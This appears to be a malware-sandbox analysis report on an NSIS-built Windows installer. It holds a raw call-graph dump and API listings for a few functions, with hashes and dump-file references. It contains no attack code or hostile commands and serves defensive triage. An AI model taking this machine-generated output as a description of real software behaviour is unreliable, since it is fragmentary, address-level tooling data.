3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                  Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                    • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425576,755723A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                  • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                  • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                  • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                  • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                                                                                                                                  Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                    • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                    • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                    • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                  • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                  • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                  • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                  • GetTempPathW.KERNELBASE(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                  • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                  • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                  • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                  • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                  • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                  Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 825 406301-406315 FindFirstFileW 826 406322 825->826 827 406317-406320 FindClose 825->827 828 406324-406325 826->828 827->828
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
